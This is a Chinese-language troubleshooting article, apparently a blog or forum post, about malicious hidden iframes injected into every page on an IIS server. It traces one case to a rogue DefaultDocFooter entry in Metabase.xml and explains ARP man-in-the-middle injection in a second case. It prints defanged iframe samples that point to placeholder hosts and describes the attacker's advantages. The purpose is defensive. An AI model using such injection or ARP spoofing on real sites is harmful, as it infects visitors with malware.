一臺服務器幾乎所有網站打開網頁 甚至HTML網頁 都出現了
<i*f*r*a*m*e src="http://xxx.xx.htm" height=0 width=0></<i*f*r*a*m*e>
這種樣式的代碼 有的在頭部 有的在尾部 部分殺毒軟件打開會報毒
打開HTML或ASP PHP頁面 在源碼中怎么也找不到這段代碼
分析原因
首先懷疑ARP掛馬,用防ARP的工具又沒有發現有arp欺騙
而且arp欺騙一般不會每次都被插入代碼,而是時有時無
而且使用http://127.0.0.1 或者http://localhost 訪問的時候也可以找到這段代碼
arp欺騙的可能排除。
然后就想到可能是JS被篡改,或者是其它的包含文件,查找后沒有發現被改的頁面 連新建的HTML頁面瀏覽的時候也會被插入這段代碼,那就只能是通過IIS掛上去的了。
備份iis數據然后重裝iis,代碼消失,將備份的iis恢復,問題又來了。
仔細尋找,問題應該出在IIS的配置文件上,打開配置文件,沒有發現那段代碼。
那很有可能是調用了某個文件,這個怎么查啊,忽然想起了大名鼎鼎的Filemon
本地載了一個上傳到服務器上,,打開Filemon,數據太多了,過濾掉一些沒有用的
只留下iis的進程,數據還是很多,看來服務器上的站點還是挺多人在訪問的。
關掉所有站點,建了一個測試站點anky 目錄為D:\www\ 在下面建了一個空白頁面test.htm
訪問一下這個頁面代碼被插進來了,再看一下Filemon 奇怪怎么讀取C:\Inetpub\wwwroot\iisstart.htm
打開C:\Inetpub\wwwroot\iisstart.htm一看,里面就躺著
<<i*f*r*a*m*e src="http://xx.xxx.jj.htm" height=0 width=0></<i*f*r*a*m*e>
把代碼刪除了留空,訪問test.htm 正常了,把C:\Inetpub\wwwroot\iisstart.htm刪除了再訪問
test.htm 出現 “讀取數據頁腳文件出錯”問題就出這里了,看來是調用了
這個文件。
把C:\Inetpub\wwwroot\iisstart.htm清空就正常了,這樣怎么行,解決問題當然要連根拔掉。
continue
有沒有可能是擴展造成的,到擴展中檢查了一遍全部都是正常的
當然 通過ISAPI 掛馬的也是存在的
左想右想最后還是覺得配置文件有問題
打開配置文件,配置文件在%windir%\system32\inetsrv\Metabase.xml
用記事本打開,查找iisstart.htm 找到一行,開始以為是默認站點,后來一想不對啊
默認站點都刪除了,再仔細一看這句代碼為
DefaultDocFooter="FILE:C:\Inetpub\wwwroot\iisstart.htm"
刪除掉這一行,問題徹底解決了。
==========================================================================
現象:不管是訪問服務器上的任何網頁,就連404的頁面也會在<html>后加入
<<i*f*r*a*m*e SRc=http://xxx.xxx.com/k.htm width=1 height=1 frameborder=0></<i*f*r*a*m*e>,掛馬的位置在html標記左右,上面這段惡意代碼,它會每隔幾秒 加入代碼,也就是說在輸出具體的東西之前就被掛了,有時有有時又沒有,不是網頁源代碼問題,也沒有在網頁源代碼中加入惡意代碼,即使重裝服務器,格式化重 分區過第一個硬盤,放上去網站沒多久一樣再會出現這種情況。
首先就排除了網站被入侵的可能,因為首頁能加在那個位置只能是title的地方,用js控制也不大可能.然后去看了php.ini的設置也沒有任何的異 常,而且這個插入的代碼有的時候出現有的時候不出現,說明不是網站的問題了.打開同服務器的其他網站也有這個情況發生,而且狀況一一樣.檢查并且搜索掛馬 的關鍵字之后確定不是網站程序的問題.
那么剩下的要么是IIS自己出了問題,要么是網絡的問題,因為數據是處理沒有問題(這個由程序輸出,而且即使是html都會出問題),經過一個一個排查, 最后基本可以確定就是arp欺騙欺騙數據報走向,然后中間人修改一些定義的關鍵字.因為是網絡層次有問題(所以重做系統是沒有用的).
目的:通過arp欺騙來直接掛馬
優點:可以直接通過arp欺騙來掛馬.
通常的arp欺騙的攻擊方式是在同一vlan下,控制一臺主機來監聽密碼,或者結合ssh中間人攻擊來監聽ssh1的密碼.
但這樣存在局限性:
1.管理員經常不登陸,那么要很久才能監聽到密碼
2.目標主機只開放了80端口,和一個管理端口,且80上只有靜態頁面,那么很難利用.而管理端口,如果是3389終端,或者是ssh2,那么非常難監聽 到密碼.
優點:
1.可以不用獲得目標主機的權限就可以直接在上面掛馬
2.非常隱蔽,不改動任何目標主機的頁面或者是配置,在網絡傳輸的過程中間直接插入掛馬的語句.
3.可以最大化的利用arp欺騙,從而只要獲取一臺同一vlan下主機的控制權,就可以最大化戰果.
原理:arp中間人攻擊,實際上相當于做了一次代理。
正常時候: A---->B ,A是訪問的正常客戶,B是要攻擊的服務器,C是被我們控制的主機
arp中間人攻擊時候: A---->C---->B
B---->C---->A
實際上,C在這里做了一次代理的作用
那么HTTP請求發過來的時候,C判斷下是哪個客戶端發過來的包,轉發給B,然后B返回HTTP響應的時候,在HTTP響應包中,插入一段掛馬的代碼,比 如<愛生活,愛貓撲>...之類,再將修改過的包返回的正常的客戶A,就起到了一個掛馬的作用.在這個過程中,B是沒有任何感覺的,直接攻擊 的是正常的客戶A,如果A是管理員或者是目標單位,就直接掛上馬了.
什么是ARP?
英文原義:Address Resolution Protocol
中文釋義:(RFC-826)地址解析協議 局域網中,網絡中實際傳輸的是“幀”,幀里面是有目標主機的MAC地址的。所謂“地址解析”就是主機在
發送幀前將目標IP地址轉換成目標MAC地址的過程。ARP協議的基本功能就是通過目標設備的IP地址,查詢目標設備的MAC地址以保證通信的順利進 行。
注解:簡單地說,ARP協議主要負責將局域網中的32為IP地址轉換為對應的48位物理地址,即網卡的MAC地址,比如IP地址為192.168.0.1 網卡MAC地址為00-03-0F-FD-1D-2B。整個轉換過程是一臺主機先向目標主機發送包含IP地址信息的廣播數據包,即ARP請求,然后目標主 機向該主機發送一個含有IP地址和MAC地址數據包,通過MAC地址兩個主機就可以實現數據傳輸了。
應用:在安裝了以太網網絡適配器的計算機中都有專門的ARP緩存,包含一個或多個表,用于保存IP地址以及經過解析的MAC地址。在Windows中要查 看或者修改ARP緩存中的信息,可以使用arp命令來完成,比如在Windows XP的命令提示符窗口中鍵入“arp -a”或“arp -g”可以查看ARP緩存中的內容;鍵入“arp -d IPaddress”表示刪除指定的IP地址項(IPaddress表示IP地址)。arp命令的其他用法可以鍵入“arp /?”查看到。
============================================================================
解決方案如下:
聯系機房,用撥網線的排除法,找出同路由內中了類似47555病毒的機器,隔離。殺毒。
其他機器,遇到這種情況,重裝系統是沒用的。
Asion注: ARP和掛馬 有很深的學問